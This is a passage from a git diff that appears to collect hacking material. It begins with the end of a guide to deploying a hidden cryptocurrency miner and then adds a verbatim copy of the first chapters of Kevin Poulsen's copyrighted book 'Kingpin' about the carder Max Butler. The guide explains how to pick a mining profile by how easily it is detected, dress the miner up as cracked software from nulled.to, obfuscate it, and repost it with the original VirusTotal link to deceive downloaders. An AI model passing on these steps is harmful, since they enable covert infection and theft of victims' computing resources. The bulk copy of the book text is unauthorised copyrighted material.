(right down corner) button and select one of the 3 Mining Profiles. Each profile +have it’s own setup and it’s connected to the mining pool, no need to mess with the +settings. +- Silent (Low Income, Low Detections, Works Great Long-Term) + +- Medium (Slightly Higher Income, Low Detections, Not-so-Good for Long-Term) +- ULTRA (Very High Income, High Detections, Awful for Long-Term) +Once you have selected the desired profile, you need to click EDIT in the MAIN TAB , +ADVANCED , CHECK API Endpoint URL and paste the link you copied earlier +(yourwebsite.com/api/endpoint.php ) +Once you have selected the desired profile, you neet to think about a spread method. +A lot of people use forums like nulled.to to spread malware so that’s what you’re +gonna do. Go to nulled, find a thread about a cracked software, copy the virustotal +link and the post description, download the files and let’s compile our miner. Delete +the software from the nulled.to folder, leave the other files. We need to make it look +as clean as possible. Go to miner and try to create the exact copy of the initial +software. +Make sure to check Icon tab, google an icon that looks identical to the initial software, +download it, click browse, select it. After that, click build. + +After you click build, an window should pop-up saying that the miner payload has +been compiled. DO NOT PRESS OK YET! Go in my folder, run Obsfucator.exe , select +the miner payload and click obsfuscate. +GREAT! Now, put your miner back in the folder that you downloaded earlier from nulled. +Create a new archive, go to website, post it, paste the initial post virus total link + +description and enjoy your free money. To check the miner status, visit your website and +you have everything there. You can use that website to withdraw funds to your personal +wallet. ENJOY! diff --git a/Kingpin - Kevin Poulsen_pdf.md b/Kingpin - Kevin Poulsen_pdf.md new file mode 100644 index 0000000..17712f4 --- /dev/null +++ b/Kingpin - Kevin Poulsen_pdf.md @@ -0,0 +1,9830 @@ +# Kingpin - Kevin Poulsen + + +--- + +Copyright © 2011 by Kevin Poulsen +All rights reserved. +Published in the United States by Crown Publishers, +an imprint of the Crown Publishing Group, +a division of Random House, Inc., New York. +www.crownpublishing.com +CROWN and the Crown colophon are registered +trademarks of Random House, Inc. +Library of Congress Cataloging-in-Publication Data +Poulsen, Kevin, 1965– +Kingpin / Kevin Poulsen.—1st ed. +p. cm. +1. Butler, Max. 2. Computer crimes—United States—Case +studies. +3. Computer hackers—United States—Case studies. 4. +Commercial criminals— +United States—Case studies. I. Title. +HV6773.2.P68 2010 +364.16′8092—dc22 2010027952 +eISBN: 978-0-307-58870-8 +Jacket design by Chris Sergio +Jacket photographs © Jonathan Kitchen/Photographer’s +Choice + +v3.1 + +For Lauren, +my unindicted coconspirator in life + +CONTENTS +Cover +Title Page +Copyright +Dedication +COPS AND CARDERS +PROLOGUE +1. The Key +2. Deadly Weapons +3. The Hungry Programmers +4. The White Hat +5. Cyberwar! +6. I Miss Crime +7. Max Vision +8. Welcome to America +9. Opportunities +10. Chris Aragon +11. Script’s Twenty-Dollar Dumps +12. Free Amex! + +13. Villa Siena +14. The Raid +15. UBuyWeRush +16. Operation Firewall +17. Pizza and Plastic +18. The Briefing +19. Carders Market +20. The Starlight Room +21. Master Splyntr +22. Enemies +23. Anglerphish +24. Exposure +25. Hostile Takeover +26. What’s in Your Wallet? +27. Web War One +28. Carder Court +29. One Plat and Six Classics +30. Maksik +31. The Trial +32. The Mall +33. Exit Strategy +34. DarkMarket +35. Sentencing +36. Aftermath +EPILOGUE +NOTES + +ACKNOWLEDGMENTS +About the Author + +COPS AND CARDERS +Max Vision, born Max Butler. Ran Carders Market under +the handle Iceman. Also known as Ghost23, Generous, +Digits, Aphex, and the Whiz. +Christopher Aragon, aka Easylivin’, Karma, and the +Dude. Max’s partner on Carders Market, who ran a +lucrative credit card counterfeiting ring fueled by Max’s +stolen data. +Script. A Ukrainian seller of stolen credit card data and +founder of CarderPlanet, the first carder forum. +King Arthur. The Eastern European phisher and ATM +cashout king who took over CarderPlanet from Script. +Maksik. The Ukrainian carder Maksym Yastremski, who +replaced Script as the underground’s top vendor of stolen +credit card data. +Albert Gonzalez, aka Cumbajohnny and SoupNazi. An +administrator on Shadowcrew, the largest crime site on the +Web until the Secret Service took it down. +David Thomas, aka El Mariachi. A veteran scammer who +ran a carding forum called the Grifters as an intelligence- +gathering operation for the FBI. +John Giannone, aka Zebra, Enhance, MarkRich, and the +Kid. A young carder from Long Island who worked with Max +online and with Chris Aragon in real life. +J. Keith Mularski, aka Master Splyntr, Pavel Kaminski. + +The Pittsburgh-based FBI agent who took over DarkMarket +in a high-stakes undercover operation. +Greg Crabb. A U.S. postal inspector, and Keith Mularski’s +mentor, who spent years tracking the underground’s elusive +international leaders. +Brett Johnson, aka Gollumfun. A Shadowcrew founder +who went on to serve as an administrator on Carders +Market. +Tea, aka Alenka. Tsengeltsetseg Tsetsendelger, a +Mongolian immigrant who helped run Carders Market from +a safe house in Orange County. +JiLsi. Renukanth Subramaniam, the Sri Lankan–born +British citizen who founded DarkMarket. +Matrix001. Markus Kellerer, a German DarkMarket +administrator. +Silo. Lloyd Liske, a Canadian hacker who became an +informant for the Vancouver police. +Th3C0rrupted0ne. A former drug dealer and recreational +hacker who served as an administrator on Carders Market. + +PROLOGUE +he taxi idled in front of a convenience store in +downtown San Francisco while Max Vision paid the driver +and unfolded his six-foot-five frame from the back of the +car, his thick brown hair pulled into a sleek ponytail. He +stepped into the store and waited for the cab to disappear +down the street before emerging for the two-block walk to +his safe house. +Around him, tiny shops and newsstands awakened under +the overcast sky, and suited workers filed into the office +towers looming above. Max was going to work too, but his +job wouldn’t have him home after nine hours for a good +night’s sleep. He’d be cloistered for days this time. Once +he put his plan into motion, there’d be no going home. No +slipping out for a bite of dinner. No date night at the +multiplex. Nothing until he was done. +This was the day he was declaring war. +His long gait took him to the Post Street Towers, from the +street a five-by-fourteen grid of identical bay windows, trim +painted the color of the Golden Gate Bridge. He’d been +coming to this apartment complex for months, doing his +best to blend in with the exchange students drawn by short +leases and reasonable rents. Nobody knew his name—not +his real one anyway. And nobody knew his past. +Here, he wasn’t Max Butler, the small-town troublemaker +driven by obsession to a moment of life-changing violence, +and he wasn’t Max Vision, the self-named computer +security expert paid one hundred dollars an hour to harden +the networks of Silicon Valley companies. As he rode up +the apartment building elevator, Max became someone + +else: “Iceman”—a rising leader in a criminal economy +responsible for billions of dollars in thefts from American +companies and consumers. +And Iceman was fed up. +For months, he’d been popping merchants around the +country, prying out piles of credit card numbers that should +have been worth hundreds of thousands on the black +market. But the market was broken. Two years earlier +Secret Service agents had driven a virtual bulldozer through +the computer underworld’s largest gathering spot, arresting +the ringleaders at gunpoint and sending the rest scurrying +into chat rooms and small-time Web forums—all riddled +with security holes and crawling with feds and snitches. It +was a mess. +Whether they knew it or not, the underworld needed a +strong leader to unify them. To bring order. +Off the elevator, Max idled in the hallway to check for a +tail, then walked to his apartment door and entered the +oppressive warmth of the rented studio. Heat was the +biggest problem with the safe house. The servers and +laptops crammed into the space produced a swelter that +pulsed through the room. He’d brought in fans over the +summer, but they provided scant relief and lofted the +electric bill so high that the apartment manager suspected +him of running a hydroponic dope farm. But it was just the +machines, entwined in a web of cables, the most important +snaking to a giant parabolic antenna aimed out the window +like a sniper rifle. +Shrugging off his discomfort, Max sat at his keyboard +and trained a bead on the Web forums where computer +criminals gathered—virtual cantinas with names like +DarkMarket and TalkCash. For two days, he hacked, his +fingers flying at preternatural speed as he breached the +sites’ defenses, stealing their content, log-ins, passwords, +and e-mail addresses. When he tired, he crashed out on +the apartment’s foldaway bed for an hour or two, then +returned bleary-eyed to his work. + +returned bleary-eyed to his work. +He finished with a few keystrokes that wiped out the +sites’ databases with the ease of an arsonist flicking a +match. On August 16, 2006, he dispatched an unapologetic +mass e-mail to the denizens of the sites he’d destroyed: +They were all now members of Iceman’s own +Cardersmarket.com, suddenly the largest criminal +marketplace in the world, six thousand users strong and the +only game in town. +With one stroke, Max had undermined years of careful +law enforcement work and revitalized a billion-dollar +criminal underworld. +In Russia and Ukraine, Turkey and Great Britain, and in +apartments, offices, and houses across America, criminals +would awaken to the announcement of the underground’s +first hostile takeover. Some of them kept guns in their +nightstands to protect their millions in stolen loot, but they +couldn’t protect themselves from this. FBI and Secret +Service agents who’d spent months or years infiltrating the +now-destroyed underground forums would read the +message with equal dismay, and for a moment, all of them +—hacking masterminds, thuggish Russian mobsters, +masters of fake identities, and the cops sworn to catch +them—would be unified by a single thought. +Who is Iceman? + +1 + +The Key +s soon as the pickup truck rolled up to the curb, the +teenage computer geeks squatting on the sidewalk knew +there’d be trouble. “Fucking wavers!” one of the cowboys +called out the window. A beer bottle flew from the truck and +crashed on the pavement. The geeks, who’d left the club to +talk away from the din of music, had seen it all before. In +Boise in 1988, being caught in public without a wide belt +buckle and a cowboy hat was a bottlin’ offense. +Then one of the geeks did something the cowboys +weren’t expecting: He stood up. Tall and broad shouldered, +Max Butler cut a quietly imposing figure that was enhanced +by his haircut, a spiky punk-rock brush that added three +inches to his height. “Waver?” Max asked calmly, feigning +ignorance of the Boise slang for New Wave music fans and +other freaks. “What’s that?” The two cowboys blustered and +swore, then finally drove away with a screech of tires and +the waving of mud flaps. +Since they met one another in junior high, Max had +become the unofficial bodyguard in the klatch of fellow +computer nerds in Meridian, Idaho, a bedroom community +then separated from Boise by eight miles of patchy +farmland. The town fathers had named Meridian a century +earlier for its placement directly on the Boise Meridian, one +of the thirty-seven invisible north-south lines that form the Y- +axes in America’s land survey system. But that was +probably the only thing geeky about the town, where the +high school rodeo team got all the girls. +Max’s parents had married young, and they’d moved to +Idaho from Phoenix when he was an infant. In some ways, + +Max combined their best qualities: Robert Butler was a +Vietnam veteran and enthusiastic technology buff who ran a +computer store in Boise. Natalie Skorupsky was the +daughter of Ukrainian immigrants—a humanist and a +peacenik, she liked to relax in front of the Weather Channel +and nature documentaries. Max inherited his mother’s +clean-living values, eschewing red meat, cigarettes, and +alcohol and drugs, except for an ill-fated experiment with +chewing tobacco. From his father, Max acquired a deep +passion for computers. He grew up surrounded by exotic +machines, from giant business computers that could double +as an office desk to the first suitcase-sized “portable” IBM +compatibles. Max was allowed to play with them freely. He +started programming in BASIC at the age of eight. +But Max’s equilibrium disappeared when his parents +divorced in his fourteenth year. His father wound up in +Boise, while Max lived in Meridian with his mother and his +younger sister, Lisa. The divorce devastated the teenager +and seemed to reduce him to two modes of operation: +relaxed, and full-bore insane. When his manic side flared, +the world was too slow to keep up; his brain moved at light +speed and focused like a laser on whatever task was +before him. After he got his driver’s license, he drove his +silver Nissan like the accelerator was a toggle switch, +speeding from stop sign to stop sign, wearing lab goggles +like a mad scientist conducting an experiment in Newtonian +physics. +As Max protected his friends, they tried to protect Max +from himself. His best buddy, a genial kid named Tim +Spencer, found Max’s world exciting but was constantly +reining in his friend’s impetuousness. One day he emerged +from his home to find Max standing over an elaborate +geometric pattern burning in the lawn. Max had found a +canister of gasoline nearby. “Max, this is our house!” Tim +shouted. Max sputtered apologies as the pair stamped out +the blaze. + +• • • +It was Max’s impulsive side that made his friends resolve +not to tell him about the key. +The Meridian geeks had found the key ring in an +unlocked desk at the back of the chemistry lab. For a time, +they just watched it, sliding open the desk drawer when the +lab instructor wasn’t around and checking to see if it was +still there. Finally, they swiped it, smuggled it from the lab, +and discreetly began testing its keys against various locks +on the Meridian High campus. That was how they +discovered that one of the keys was a master key to the +school; it opened the front door and every door behind it. +Four copies were made, one for each of them: Tim, Seth, +Luke, and John. The key ring was returned to the darkness +of the chem lab desk after being carefully wiped down for +fingerprints. They all agreed that Max must not know. A +master key to the high school is a very special talisman that +must be wielded with great care—not squandered on +foolishness. So the juniors vowed to save the key for an +epic senior-year prank. They would sneak into the school +and hijack the PA system, blaring music into every +classroom. Until that day, the four keys would stay in hiding, +a burden borne in silence by the four of them. +Nobody liked keeping secrets from Max, but they could +see that he was already on a collision course with the +school’s administrators. Max scoffed at the curriculum, and +while instructors droned on about history or sketched +equations on the blackboard, Max would sit at his desk +thumbing through computer printouts from dial-up bulletin +board systems and the pre-Web Internet. His favorite read +was an online hacker newsletter called Phrack, a product of +the late-1980s hacking scene. In its plain, unadorned text, +Max could follow the exploits of editors Taran King and +Knight Lightning, and contributors like Phone Phanatic, +Crimson Death, and Sir Hackalot. +The first generation to come of age in the home + +computing era was tasting the power at its fingertips, and +Phrack was a jolt of subversive, electric information from a +world far beyond Meridian’s sleepy borders. A typical issue +was packed with tutorials on packet-switched networks like +Telenet and Tymnet, guides to telephone-company +computers like COSMOS, and inside looks at large-scale +operating systems powering mainframe and mini- +computers in air-conditioned equipment rooms around the +globe. +Phrack also diligently tracked news reports from the +frontier battleground between hackers and their opponents +in state and federal law enforcement, who were just +beginning to meet the challenges posed by recreational +hackers. In July 1989, a Cornell graduate student named +Robert T. Morris Jr. was charged under a brand-new +federal computer crime law after he launched the first +Internet worm—a virus that spread to six thousand +computers, clogging network bandwidth and dragging +systems to a halt. The same year, in California, a young +Kevin Mitnick picked up his second hacking arrest and +received one year in prison—a startlingly harsh sentence at +the time. +Max became “Lord Max” on the Boise bulletin board +systems and delved into phone phreaking—a hacking +tradition dating to the 1970s. When he used his +Commodore 64 modem to scan for free long-distance +codes, he had his first run-in with the federal government: A +Secret Service agent from the Boise field office visited Max +at school and confronted him with the evidence of his +phreaking. Because he was a juvenile, he wasn’t charged. +But the agent warned Max to change course before he got +in real trouble. +Max promised he’d learned his lesson. +Then the unthinkable happened. Max noticed an odd +shape on John’s key ring and asked what it was. John +confessed the truth. + +Max and John entered the school that very night and went +berserk. One or both of them scrawled messages on the +walls, sprayed fire extinguishers in the hallways, and +plundered the locked closet in the chemistry lab. Max +carted off an assortment of chemicals and piled them into +the backseat of his car. +Seth’s phone rang early the next morning. It was Max; +he’d left Seth a gift in his front yard. Seth walked out to find +the bottles of chemicals sitting in a pile on his lawn. +Panicked, he scooped them up and took them into the +back, where he grabbed a shovel and started digging a +hole. +His mother stepped out back and caught Seth in the act +of burying the evidence. +“You know I have to tell the school now, right?” she said. +Seth was brought into the principal’s office and +interrogated, but he refused to name Max. One by one, the +other Meridian High geeks were dragged in by the school’s +uniformed security officer for questioning, some in +handcuffs. When it was John’s turn, he spilled the beans. +The school called the police, who found a telltale yellow +iodine stain in the back of Max’s Nissan. +The chemical theft was taken very seriously in Meridian. +Max was expelled from school and prosecuted as a +juvenile. He pleaded guilty to malicious injury to property, +first-degree burglary, and grand theft, and spent two weeks +at an in-care facility under psychiatric evaluation, where the +staff diagnosed him as bipolar. His final sentence was +probation. His mother sent him to Boise to live with his +father and attend Bishop Kelly, the only Catholic high +school in the state. +Max’s first criminal conviction was a minor one. But the +impulsiveness and mischievousness that spawned it ran +deep in Max’s personality. And he was destined to hold a +lot more master keys. + +2 + +Deadly Weapons +HIS is the Rec Room!!!! +This large, darkened room has no obvious exits. A +crowd relaxes on pillows in front of a giant screen TV, and +there is a fully stocked fridge and a bar. +Those words welcomed visitors to TinyMUD, an online +virtual world contained in a beige computer the size of a +minifridge squatting on the floor of a Pittsburgh graduate +student’s office. In 1990, hundreds of people from around +the globe projected into the world over the Internet. Max, +now a freshman at Boise State University, was one of them. +The Internet was seven years old then, and about three +million people had access through a measly three hundred +thousand host computers at defense contractors, military +sites, and, increasingly, colleges and universities. In +academia, the Net was once seen as too important to +expose directly to undergraduates, but that was changing, +and now any decent U.S. college allowed students online. +MUDs—“multi-user dungeons”—became a favorite +hangout. +Like most everything else on the pre-Web Internet, a +MUD was a purely textual experience—a universe defined +entirely by prose and navigated by simple commands like +“north” and “south.” TinyMUD was distinct as the first online +world to shrug off the Dungeons and Dragons–inspired +rules that had shackled earlier MUDs. Instead of limiting the +power of creation to select administrators and “wizards,” for +example, TinyMUD granted all its inhabitants the ability to +alter the world around them. Anyone could create a space +of his own, define its attributes, mark its borders, and + +receive visitors. Inhabitants quickly anointed the user- +created recreation room the world’s social hub, building off +it until its exits and entrances connected directly to +TinyMUD spaces like Ghondahrl’s Flat, Majik’s Perversion +Palace, and two hundred other locales. +Also gone from TinyMUD was the D & D–style reward +system that emphasized collecting wealth, finishing quests, +and slaying monsters. Now, instead of doing battle with +orcs and building up their characters’ experience points, +users talked, flirted, fought, and had virtual sex. It turned out +that freeing the game from the constraints of Tolkienesque +roleplay made it more like real life and added to its +addictive power. A common joke had it that MUD really +stood for “multi-undergraduate destroyer.” For Max, that +would prove more than just a joke. +At Max’s urging, his girlfriend Amy had joined him in one +of the TinyMUDs.* The original at Carnegie Mellon +University had closed in April, but by then the same free +software was powering several successor MUDs scattered +around the Net. Max became Lord Max, and Amy took the +name Cymoril, after a tragic heroine in Michael Moorcock’s +Elric of Melniboné series of books and short stories— +some of Max’s favorites. +In the stories, Cymoril is the beloved of Elric, a weak +albino transformed into a fearsome wizard emperor by dint +of a magic sword called Stormbringer. To Max, the fictional +sword was a metaphor for the power of a computer— +properly wielded, it might turn an ordinary man into a king. +But for Elric, Stormbringer was also a curse: He was bound +to the sword, fought to tame it, and was ultimately mastered +by it instead. +Elric’s epic, doomed romance with Cymoril was very +much of a piece with the fraught, uncompromising vision of +romantic love Max had formed after his parents’ divorce: +Cymoril meets her fate during a battle between Elric and +his hated cousin Yyrkoon. Cymoril pleads with Elric to +sheath Stormbringer and stop the fight, but Elric, + +sheath Stormbringer and stop the fight, but Elric, +possessed by rage, presses on, striking Yyrkoon with a +mortal blow. With his last breath, Yyrkoon exacts a +heartbreaking revenge, pushing Cymoril onto the tip of +Stormbringer. +Then the dark truth dawned on his clearing brain +and he moaned in grief, like an animal. He had slain +the girl he loved. The runesword fell from his grasp, +stained by Cymoril’s lifeblood, and clattered +unheeded down the stairs. Sobbing now, Elric +dropped beside the dead girl and lifted her in his +arms. +“Cymoril,” he moaned, his whole body throbbing. +“Cymoril—I have slain you.” +When she first met Max, Amy thought he was cool, +rebellious, and kind of punky—different from the usual +Boise crowd. But as they spent every free moment +together, she began to see a darker, obsessive side to his +personality, particularly after he introduced her to the +Internet and TinyMUD. +At first Max was thrilled that his girlfriend shared his +passion for the online world. But as Amy started making +friends of her own in the MUD, including guys, he became +jealous and combative. To Max it made no difference if +Amy was cheating on him in the virtual world or the real +one: It was cheating either way. He tried to get her to stop +logging on, but she refused, and the couple began arguing +online and off. +Eventually, Amy’d had enough; they were arguing about a +stupid computer game? On a Wednesday night in early +October 1990, the couple were in another user’s room in +TinyMUD when Cymoril finally told Lord Max that she wasn’t +sure they really belonged together after all. +It was Max’s first serious relationship, and his reaction +was powerful. They had sworn to spend their lives united. + +Now they should both die, rather than be parted, he wrote in +the MUD. Then he got explicit, telling her how he’d kill her. +Other users watched with growing concern as his raging +took on the tone of a serious threat. What should they do? +One of the in-world wizards got Max’s Internet IP address +from the server—a unique identifier that was easily traced +to Boise State University. The MUDers looked up the +phone number for the Ada County Sheriff’s Department in +Boise and called in a warning that a potential murder- +suicide was unfolding. +The year had begun hopefully for Max. He excelled at the +part-time job his dad gave him at his computer store, +HiTech Systems, performing clerical work, making +deliveries in the company van, and assembling PC- +compatible computers in the shop. And he managed to +stay clean of probation violations—though he’d stopped +taking his bipolar medication; his father didn’t want him +drugged, and, anyway, Max didn’t agree with the diagnosis. +He began dating Amy in February of 1990, four months +after meeting her at the Zoo, a dance club in Boise that +catered to an underage crowd. A year younger than Max, +she was blond, blue-eyed, and, when he first saw her, on +the arm of Max’s friend Luke Sheneman, one of the former +Meridian key bearers. As Max finished up his last year in +high school, they began getting serious. +Max did nothing in half measures, and his devotion to +Amy was absolute. She planned on attending Boise State +University, so Max applied there, postponing his dream of +attending CMU or MIT. He brought her home to meet his +computer, and the couple played Tetris together. Their +relationship was everything his parents’ hadn’t been. They +both thought it would never end. +His old friends barely saw him over summer break. Then +the fall term began at Boise State. Max declared a major in +computer science and enrolled in a battery of courses: + +calculus, chemistry, and a computer class on data +structures. Like all students, he was given an account on +the school’s shared UNIX system. Like a few of them, he +started hacking the computer right away. Max’s path was +eased by another student, David, who’d already worried his +way into a bunch of the faculty accounts. They spent hours +in the BSU terminal room, staring at the luminous green text +of the terminals and banging on the clacky keyboards. +They’d skim through faculty e-mail boxes while holding long, +silent conversations, shooting messages back and forth +across the room through the computer. David struggled to +keep up with Max’s overclocked mind and typing speed, +and Max would often get impatient. “What are you waiting +for?” Max would type when David fell behind in the +conversation. “Respond.” +A little local hacking was generally tolerated by +administrators. But then Max started poking at the +defenses of other Internet systems, earning him a brief ban +from the BSU computer. When his access was restored, he +was back on TinyMUD, fighting with Amy. +The sheriff called BSU’s network administrator at two in the +morning to tell him about the murder-suicide threat. The +police wanted a copy of Max’s computer files to examine +for evidence—a request that raised difficult privacy issues +for the college. After some discussion with the university’s +lawyer, administrators decided not to voluntarily hand over +anything. Instead, they’d preserve Max’s files on a +computer tape and lock Max out of the computer at once. +Amy worried about what Max might do next, even as she +pressed through the slow process of breaking up with him. +She still cared about Max, she’d later testify, and was afraid +he’d really hurt himself. +Max continued to call her after the TinyMUD incident, and +the conversations followed a predictable pattern. Max +would start off nice—showing the friendly, caring side that + +his friends and family knew well. Then he’d escalate into +self-pity and threats before hanging up in anger. +On October 30, Max told Amy he wanted to talk to her in +person. Still hoping to end the relationship amicably—she +was bound to see Max on campus, and she didn’t want him +hating her—Amy agreed to come over. +Max had just moved back to his mother’s home in +Meridian, a ranchstyle house on a quiet street a block from +his old high school. He met Amy at the door, and after +reassuring her that he wouldn’t do anything crazy, she +followed him to his bedroom at the back of his house. His +mother was out, and his fourteen-year-old sister was +watching TV. +His bed was still disassembled, so they sat together on +the mattress on the floor and began discussing their +feelings. Amy admitted that she’d met another boy in +TinyMUD. His name was Chad, and he lived in North +Carolina. The relationship had moved beyond the +keyboard; they’d sent each other photos in the mail, and +she’d been calling him on the phone. +Max struggled to control his feelings, holding back tears. +He felt betrayed, he said. At the same time, he couldn’t +quite believe what he was hearing. He asked her for +Chad’s phone number, produced a calling card, and dialed +his online rival. +A strained three-way conversation followed; Max +introduced himself to Chad and then let Amy take over. She +told Chad how she felt. Then Chad asked Amy for her +phone number. She gave it to him, and the conversation +drifted into an idle banter that only added to Max’s +agitation. He grabbed at the phone and hung it up. +Amy watched Max carefully as his breathing intensified +and his eyes darted around the room. +“I’m going to kill you,” he finally said. “I’m going to—you’re +going to die now.” +She told Max that she didn’t feel like she’d betrayed him, +and she wouldn’t apologize. Max began trembling. Then his + +and she wouldn’t apologize. Max began trembling. Then his +hands were around her throat and he was pushing her +down onto the mattress. +“Fine,” she said. “Why don’t you just kill me then?” +Once Max regained his self-control, he wanted Amy out +of his sight. He pulled her from the mattress, pushed her out +of his bedroom, and shuffled her through the house and out +the front door. +“Go, now,” he said. “Just get out, because I don’t want to +kill you. But I might change my mind.” Amy jumped into her +car and took off fast. +As she headed back to Boise, she replayed the events in +her mind. Lost in thought, she didn’t see the other car until +she was slamming into it with a jolt and the crunch of metal +against metal. +Both cars were totaled, but no one was seriously hurt. +When Amy’s parents learned about the confrontation at +Max’s house, though, they began to fear for her life. A week +after the accident, Amy went to the police, and Max was +arrested. +Max told his friends that Amy was exaggerating the +incident. In Amy’s version of events, Max had kept her +prisoner in his bedroom for an hour, his hands returning to +her throat repeatedly, at one point briefly cutting off her +breathing. In Max’s version, he’d put his fingers loosely on +her throat for one minute, but he hadn’t choked her, and she +was always free to leave. Amy said Max continued to +phone her obsessively after the incident, issuing more +threats; Max said he left her alone after pushing her out of +his house. As far as Max was concerned, Amy was +sacrificing him to get out of trouble for her car accident. +The county prosecutor offered Max a misdemeanor deal. +But a month before he was scheduled to receive a forty- +five-day slap on the wrist from the judge, Max—free on his +own recognizance—spotted Amy walking hand in hand with +a new boyfriend down University Avenue. + +Once again, Max’s emotions overrode his common +sense. On impulse he pulled his father’s repair-shop van +onto a lawn and caught up with the couple on foot. His body +was tight with tension as he circled the pair. +“Hi,” he said. +“You’re not supposed to be around me,” Amy said in +protest. +“Don’t you remember what we used to have?” +Amy’s escort spoke up, and Max gave him a warning: +“Better watch yourself, friend.” Then he stalked off. A +moment later, the roar of an engine. Max was back in the +van, zooming across the center line toward the couple on +the sidewalk. He passed close enough for Amy to feel the +wind from the van as it tore off. +The deal was canceled. The district attorney stretched +the law to slam Max with a felony charge of assault with a +deadly weapon—his hands. It was a questionable charge: +Max’s hands were no deadlier a weapon than anyone +else’s. +The prosecution offered him a new deal: nine months in +jail, if Max would admit to choking Amy. He refused. After a +three-day trial, and just an hour and a half of deliberation, +the jury found him guilty. On May 13, 1991, Tim Spencer +and some of the other Meridian High geeks sat in the +courtroom and watched as Judge Deborah Bail sentenced +their friend to five years in prison. +* Amy is not her real name. + +3 + +The Hungry Programmers +ax found Tim Spencer’s house perched at a summit +in the hills separating the suburban sprawl of the San +Francisco Peninsula from the quiet, undeveloped towns +clinging to the Pacific coast. But “house” was too small a +word. It was a villa, six thousand square feet sprawling +across a fifty-acre plot overlooking the sleepy coastal town +of Half Moon Bay. Max passed through the entranceway +columns to the double front doors and entered the +cavernous living room, where a curved wall of windows +stretched from floor to ceiling. +It was a year after his parole, and Max had come to San +Francisco to start over. Tim and some of his friends from +Idaho had been renting the house they called “Hungry +Manor,” the name a reference to their first enterprise when +they’d migrated to the Bay Area a year earlier. They’d +planned to bootstrap into the Silicon Valley economy by +forming a computer consulting business called the Hungry +Programmers—will code for food. Instead, the valley +quickly metabolized the geeks into full-time employment, +and the Hungry Programmers morphed into an unofficial +club for Tim’s friends from Meridian High and the University +of Idaho, two dozen in all. Hungry Manor was the group’s +party house and home to five of them. Max would be the +sixth. +Max walked into Hungry Manor with few belongings but +lots of baggage, not least a deep bitterness over his +treatment by the justice system. In 1993, while Max was on +his second year in prison, Idaho’s Supreme Court ruled in a +similar case that hands “or other body parts or + +appendages” couldn’t be considered deadly weapons. +That meant Max should never have been convicted of +aggravated assault. Despite the ruling, Max’s own appeal +was denied on procedural grounds: The judge conceded +that Max was technically not guilty of the felony for which he +was serving time, but his old lawyer had failed to raise the +issue in an earlier appeal, and it was too late now. +When Max was finally paroled on April 26, 1995, he left +knowing that he’d served more than four years in the Idaho +State Penitentiary for what, by law, should have been a +misdemeanor worth sixty days in the county jail. He’d +served hard time on an unjust sentence, while beyond the +prison fence his friends had gone off to college, earned +four-year degrees, then left Idaho to start promising +careers. +He’d moved in with his dad near Seattle, and Tim, Seth, +and Luke drove up from San Francisco for a reunion party +of the old Meridian High geeks. They marveled at Max’s +prison-enhanced physique and his seemingly boundless +optimism, despite having no degree and a serious felony +conviction on his record. Max knew it was a time of +opportunity: A British computer scientist had created the +World Wide Web three months after Max’s sentencing. +Now there were nearly nineteen thousand websites, +including one for the White House. Dial-up Internet service +providers were surfacing in every major city, and America +Online and CompuServe were adding Web access to their +offerings. +Everyone was going online; Max was no longer the +weirdo, addicted to a network nobody had heard of. Now, it +turned out, he’d been at the head of a pack that was +growing to include millions of people. Yet, thanks to his +record, Max struggled to win computer employment in +Seattle, working odd tech-support jobs through a temp +agency. +Online, Max was hanging out in some rough +neighborhoods. Looking for the technical challenges his + +neighborhoods. Looking for the technical challenges his +day jobs denied him, Max returned to a network of chat +rooms called IRC, Internet relay chat, a surviving vestige of +the old Internet of his teenage years. When he’d gone to +prison, IRC had been a social hotspot. But with the +gentrification of the Net, most inhabitants moved uptown to +easy-to-use instant messaging clients and Web-based chat +systems. Those who remained on IRC tended to be either +hard-core geeks or disreputable sorts—hackers and +pirates scheming in the forgotten tunnels and alleyways +below the whitewashed, commercialized Internet growing +above them. +Max fancied himself an invisible, spectral presence in +cyberspace. He chose “Ghost23” as his IRC identity—23 +was his lucky number, and among other meanings it was +the I Ching hexagram representing chaos. He floated into +the IRC “warez” scene, where scofflaws build their +reputations by pirating music, commercial software, and +games. There, Max’s computer skills found an appreciative +audience. Max found an unprotected FTP file server at an +ISP in Littleton, Colorado, and turned it into a cache for +stolen software for himself and his new friends, stocked +with bootlegged copies of programs like NetXray, Laplink, +and Symantec’s pcAnywhere. +It was a mistake. The ISP noticed the drain on its +bandwidth and traced Max’s uploads to the corporate +offices of CompuServe in Bellevue, where Max had just +started working a new temp job. Max was fired. Barely a +year after his release from prison, his name was mud. +That was when Max decided to start over again in Silicon +Valley, where the dot-com economy was swelling to +ripeness and a talented computer genius could pick up +work without a lot of questions about his past. +He’d need a new name, unstained by his past folly. Max +had been known by a nickname in the joint, one +abbreviated from a cyberpunk-themed ’zine he’d published +from the prison typewriter: Maximum Vision. It was a clean, + +optimistic name that exemplified everything he wanted to +be and crystallized his clarity and hopefulness. +As he left Seattle in the rearview mirror, he said good- +bye to Max Butler. From now on, he would be Max Ray +Vision. +• • • +Max Vision found that life in Hungry Manor was good. +Surrounded by rolling meadows on all sides, the house +boasted two wings, four bedrooms, a maid’s quarters, a full +dining room, a livestock pen, and a brick pizza oven and +indoor barbecue in a vented room adjoining the vast, sunlit +kitchen. The Hungries had turned the library into a computer +lab and server room, packing in a slew of custom-built +gaming PCs for recreation. They ran networking cable into +every room and energized it with a high-speed Internet link +that necessitated the partial shutdown of the 92 freeway as +the phone company trenched a new cable run alongside the +road. A vintage phone system linked the west wing to the +east. As a finishing touch, one of the Hungry Programmers +had brought in a hot tub and set it up on the grounds, under +the stars. +Max couldn’t have asked for a better launchpad for his +new life. One of the resident Hungries got him a job as a +system administrator at MPath Interactive, a computer +gaming start-up in Silicon Valley that was flush with venture +capital. He threw himself into the job. Defying the +stereotype of a computer nerd, he drew his greatest +satisfaction from his support duties. He liked helping +people. +But it wasn’t long before Max’s antics in Seattle caught +up with him. One morning, a process server showed up at +his cubicle to hand him a $300,000 lawsuit filed by the +Software Publishers Association—an industry group that +had decided to use his piracy bust to send a message. +“This action is a warning to Internet users who believe they + +can infringe software copyrights without fear of exposure or +penalty,” the association proclaimed in a press release. +As the first lawsuit of its kind, the case earned Max Butler +a brief write-up in Wired magazine and a mention in a +congressional hearing on Internet piracy. Max Vision, +though, emerged largely unscathed—few in his new life +made the connection to the man named in the high-profile +lawsuit. +When the press attention faded, the SPA was willing to +quietly settle the case for $3,500 and some free computer +consulting. The whole affair even had a silver lining. It +introduced Max to the FBI. +Chris Beeson, a young agent with the bureau’s San +Francisco computer crime squad, gave Max his pitch. The +FBI could use Max’s assistance navigating the 